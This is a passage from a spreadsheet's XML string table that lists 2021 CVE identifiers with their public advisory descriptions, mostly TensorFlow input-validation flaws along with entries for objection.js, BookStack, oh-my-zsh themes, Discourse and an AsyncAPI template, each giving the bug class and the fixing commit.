    <t>CVE-2021-37657</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixDiagV*`. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong. We have patched the issue in GitHub commit f2a673bd34f0d64b8e40a551ac78989d16daad09. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37658</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixSetDiagV*`. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong. We have patched the issue in GitHub commit ff8894044dfae5568ecbf2ed514c1a37dc394f1b. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37659</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in all binary cwise operations that don't require broadcasting (e.g., gradients of binary cwise operations). The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/cwise_ops_common.h#L264) assumes that the two inputs have exactly the same number of elements but does not check that. Hence, when the eigen functor executes it triggers heap OOB reads and undefined behavior due to binding to nullptr. We have patched the issue in GitHub commit 93f428fd1768df147171ed674fee1fc5ab8309ec. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3766</t>
  </si>
  <si>
    <t>objection.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-37660</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause a floating point exception by calling inplace operations with crafted arguments that would result in a division by 0. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/inplace_ops.cc#L283) has a logic error: it should skip processing if `x` and `v` are empty but the code uses `||` instead of `&amp;&amp;`. We have patched the issue in GitHub commit e86605c0a336c088b638da02135ea6f9f6753618. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37661</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause a denial of service in `boosted_trees_create_quantile_stream_resource` by using negative arguments. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/quantile_ops.cc#L96) does not validate that `num_streams` only contains non-negative numbers. In turn, [this results in using this value to allocate memory](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/quantiles/quantile_stream_resource.h#L31-L40). However, `reserve` receives an unsigned integer so there is an implicit conversion from a negative value to a large positive unsigned. This results in a crash from the standard library. We have patched the issue in GitHub commit 8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37662</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can generate undefined behavior via a reference binding to nullptr in `BoostedTreesCalculateBestGainsPerFeature` and similar attack can occur in `BoostedTreesCalculateBestFeatureSplitV2`. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) does not validate the input values. We have patched the issue in GitHub commit 9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad and in commit 429f009d2b2c09028647dd4bb7b3f6f414bbaad7. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37663</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions due to incomplete validation in `tf.raw_ops.QuantizeV2`, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/quantize_op.cc#L59) has some validation but does not check that `min_range` and `max_range` both have the same non-zero number of elements. If `axis` is provided (i.e., not `-1`), then validation should check that it is a value in range for the rank of `input` tensor and then the lengths of `min_range` and `max_range` inputs match the `axis` dimension of the `input` tensor. We have patched the issue in GitHub commit 6da6620efad397c85493b8f8667b821403516708. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37664</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `BoostedTreesSparseCalculateBestFeatureSplit`. The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) needs to validate that each value in `stats_summary_indices` is in range. We have patched the issue in GitHub commit e84c975313e8e8e38bb2ea118196369c45c51378. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37665</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions due to incomplete validation in MKL implementation of requantization, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/mkl/mkl_requantization_range_per_channel_op.cc) does not validate the dimensions of the `input` tensor. A similar issue occurs in `MklRequantizePerChannelOp`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/mkl/mkl_requantize_per_channel_op.cc) does not perform full validation for all the input arguments. We have patched the issue in GitHub commit 9e62869465573cb2d9b5053f1fa02a81fce21d69 and in the Github commit 203214568f5bc237603dbab6e1fd389f1572f5c9. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37666</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToVariant`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129) has an incomplete validation of the splits values, missing the case when the argument would be empty. We have patched the issue in GitHub commit be7a4de6adfbd303ce08be4332554dff70362612. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37667</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty. We have patched the issue in GitHub commit 2e0ee46f1a47675152d3d865797a18358881d7a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37668</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause denial of service in applications serving models using `tf.raw_ops.UnravelIndex` by triggering a division by 0. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unravel_index_op.cc#L36) does not check that the tensor subsumed by `dims` is not empty. Hence, if one element of `dims` is 0, the implementation does a division by 0. We have patched the issue in GitHub commit a776040a5e7ebf76eeb7eb923bf1ae417dd4d233. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37669</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause denial of service in applications serving models using `tf.raw_ops.NonMaxSuppressionV5` by triggering a division by 0. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/image/non_max_suppression_op.cc#L170-L271) uses a user controlled argument to resize a `std::vector`. However, as `std::vector::resize` takes the size argument as a `size_t` and `output_size` is an `int`, there is an implicit conversion to unsigned. If the attacker supplies a negative value, this conversion results in a crash. A similar issue occurs in `CombinedNonMaxSuppression`. We have patched the issue in GitHub commit 3a7362750d5c372420aa8f0caf7bf5b5c3d0f52d and commit [b5cdbf12ffcaaffecf98f22a6be5a64bb96e4f58. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3767</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-37670</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `tf.raw_ops.UpperBound`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/searchsorted_op.cc#L85-L104) does not validate the rank of `sorted_input` argument. A similar issue occurs in `tf.raw_ops.LowerBound`. We have patched the issue in GitHub commit 42459e4273c2e47a3232cc16c4f4fff3b3a35c38. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37671</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.Map*` and `tf.raw_ops.OrderedMap*` operations. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/map_stage_op.cc#L222-L248) has a check in place to ensure that `indices` is in ascending order, but does not check that `indices` is not empty. We have patched the issue in GitHub commit 532f5c5a547126c634fefd43bbad1dc6417678ac. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37672</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `tf.raw_ops.SdcaOptimizerV2`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/sdca_internal.cc#L320-L353) does not check that the length of `example_labels` is the same as the number of examples. We have patched the issue in GitHub commit a4e138660270e7599793fa438cd7b2fc2ce215a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37673</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.MapStage`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/map_stage_op.cc#L513) does not check that the `key` input is a valid non-empty tensor. We have patched the issue in GitHub commit d7de67733925de196ec8863a33445b73f9562d1d. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37674</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a denial of service via a segmentation fault in `tf.raw_ops.MaxPoolGrad` caused by missing validation. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/maxpooling_op.cc) misses some validation for the `orig_input` and `orig_output` tensors. The fixes for CVE-2021-29579 were incomplete. We have patched the issue in GitHub commit 136b51f10903e044308cf77117c0ed9871350475. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37675</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions most implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash. The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/framework/common_shape_fns.cc#L577) is missing several validations before doing divisions and modulo operations. We have patched the issue in GitHub commit 8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37676</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.SparseFillEmptyRows`. The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/ops/sparse_ops.cc#L608-L634) does not validate that the input arguments are not empty tensors. We have patched the issue in GitHub commit 578e634b4f1c1c684d4b4294f9e5281b2133b3ed. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37677</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the shape inference code for `tf.raw_ops.Dequantize` has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments. The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/ops/array_ops.cc#L2999-L3014) uses `axis` to select between two different values for `minmax_rank` which is then used to retrieve tensor dimensions. However, code assumes that `axis` can be either `-1` or a value greater than `-1`, with no validation for the other values. We have patched the issue in GitHub commit da857cfa0fde8f79ad0afdbc94e88b5d4bbec764. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37678</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. Given that YAML format support requires a significant amount of work, we have removed it for now. We have patched the issue in GitHub commit 23d6383eb6c14084a8fc3bdf164043b974818012. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37679</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions it is possible to nest a `tf.map_fn` within another `tf.map_fn` call. However, if the input tensor is a `RaggedTensor` and there is no function signature provided, code assumes the output is a fully specified tensor and fills output buffer with uninitialized contents from the heap. The `t` and `z` outputs should be identical, however this is not the case. The last row of `t` contains data from the heap which can be used to leak other memory information. The bug lies in the conversion from a `Variant` tensor to a `RaggedTensor`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_from_variant_op.cc#L177-L190) does not check that all inner shapes match and this results in the additional dimensions. The same implementation can result in data loss, if input tensor is tweaked. We have patched the issue in GitHub commit 4e2565483d0ffcadc719bd44893fb7f609bb5f12. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3768</t>
  </si>
  <si>
    <t>CVE-2021-37680</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of fully connected layers in TFLite is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/fully_connected.cc#L226). We have patched the issue in GitHub commit 718721986aa137691ee23f03638867151f74935f. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37681</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of SVDF in TFLite is [vulnerable to a null pointer error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/svdf.cc#L300-L313). The [`GetVariableInput` function](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L115-L119) can return a null pointer but `GetTensorData` assumes that the argument is always a valid tensor. Furthermore, because `GetVariableInput` calls [`GetMutableInput`](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L82-L90) which might return `nullptr`, the `tensor-&gt;is_variable` expression can also trigger a null pointer exception. We have patched the issue in GitHub commit 5b048e87e4e55990dae6b547add4dae59f4e1c76. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37682</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions all TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200). The issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code. We have patched the issue in GitHub commits 537bc7c723439b9194a358f64d871dd326c18887, 4a91f2069f7145aab6ba2d8cfe41be8a110c18a5 and 8933b8a21280696ab119b63263babdb54c298538. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37683</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementation of division in TFLite is [vulnerable to a division by 0 error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/div.cc). There is no check that the divisor tensor does not contain zero elements. We have patched the issue in GitHub commit 1e206baedf8bef0334cca3eb92bab134ef525a28. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37684</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the implementations of pooling in TFLite are vulnerable to division by 0 errors as there are no checks for divisors not being 0. We have patched the issue in GitHub commit [dfa22b348b70bb89d6d6ec0ff53973bacb4f4695](https://github.com/tensorflow/tensorflow/commit/dfa22b348b70bb89d6d6ec0ff53973bacb4f4695). The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37685</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions TFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data. If `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`). We have patched the issue in GitHub commit d94ffe08a65400f898241c0374e9edc6fa8ed257. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37686</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions the strided slice implementation in TFLite has a logic bug which can allow an attacker to trigger an infinite loop. This arises from newly introduced support for [ellipsis in axis definition](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/strided_slice.cc#L103-L122). An attacker can craft a model such that `ellipsis_end_idx` is smaller than `i` (e.g., always negative). In this case, the inner loop does not increase `i` and the `continue` statement causes execution to skip over the preincrement at the end of the outer loop. We have patched the issue in GitHub commit dfa22b348b70bb89d6d6ec0ff53973bacb4f4695. TensorFlow 2.6.0 is the only affected version.</t>
  </si>
  <si>
    <t>CVE-2021-37687</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions TFLite's [`GatherNd` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather_nd.cc#L124) does not support negative indices but there are no checks for this situation. Hence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in `indices`. Similar issue exists in [`Gather` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather.cc). We have patched the issue in GitHub commits bb6a0383ed553c286f87ca88c207f6774d5c4a8f and eb921122119a6b6e470ee98b89e65d721663179d. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37688</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/internal/optimized/optimized_ops.h#L268-L285) unconditionally dereferences a pointer. We have patched the issue in GitHub commit 15691e456c7dc9bd6be203b09765b063bf4a380c. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37689</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service. This is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/lite/transforms/optimize.cc#L67-L70) unconditionally dereferences a pointer to an iterator to a vector without checking that the vector has elements. We have patched the issue in GitHub commit d6b57f461b39fd1aa8c1b870f1b974aac3554955. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-3769</t>
  </si>
  <si>
    <t># Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.</t>
  </si>
  <si>
    <t>CVE-2021-37690</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions when running shape functions, some functions (such as `MutableHashTableShape`) produce extra output information in the form of a `ShapeAndType` struct. The shapes embedded in this struct are owned by an inference context that is cleaned up almost immediately; if the upstream code attempts to access this shape information, it can trigger a segfault. `ShapeRefiner` is mitigating this for normal output shapes by cloning them (and thus putting the newly created shape under ownership of an inference context that will not die), but we were not doing the same for shapes and types. This commit fixes that by doing similar logic on output shapes and types. We have patched the issue in GitHub commit ee119d4a498979525046fba1c3dd3f13a039fbb1. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37691</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can craft a TFLite model that would trigger a division by zero error in LSH [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/lsh_projection.cc#L118). We have patched the issue in GitHub commit 0575b640091680cfb70f4dd93e70658de43b94f9. The fix will be included in TensorFlow 2.6.0. We will also cherrypick thiscommit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.</t>
  </si>
  <si>
    <t>CVE-2021-37692</t>
  </si>
  <si>
    <t>TensorFlow is an end-to-end open source platform for machine learning. In affected versions under certain conditions, Go code can trigger a segfault in string deallocation. For string tensors, `C.TF_TString_Dealloc` is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method for dealloc assumes that encoding succeeded, but segfaults when a string tensor is garbage collected whose encoding failed (e.g., due to mismatched dimensions). To fix this, the call to set the finalizer function is deferred until `NewTensor` returns and, if encoding failed for a string tensor, deallocs are determined based on bytes written. We have patched the issue in GitHub commit 8721ba96e5760c229217b594f6d2ba332beedf22. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, which is the other affected version.</t>
  </si>
  <si>
    <t>CVE-2021-37693</t>
  </si>
  <si>
    <t>Discourse is an open-source platform for community discussion. In Discourse before versions 2.7.8 and 2.8.0.beta4, when adding additional email addresses to an existing account on a Discourse site an email token is generated as part of the email verification process. Deleting the additional email address does not invalidate an unused token which can then be used in other contexts, including reseting a password.</t>
  </si>
  <si>
    <t>CVE-2021-37694</t>
  </si>
  <si>
    <t>@asyncapi/java-spring-cloud-stream-template generates a Spring Cloud Stream (SCSt) microservice. In versions prior to 0.7.0 arbitrary code injection was possible when an attacker controls the AsyncAPI document. An example is provided in GHSA-xj6r-2jpm-qvxp. There are no mitigations available and all users are advised to update.</t>
  </si>
  <si>
    <t>CVE-2021-37695</t>
  </si>
  <si>
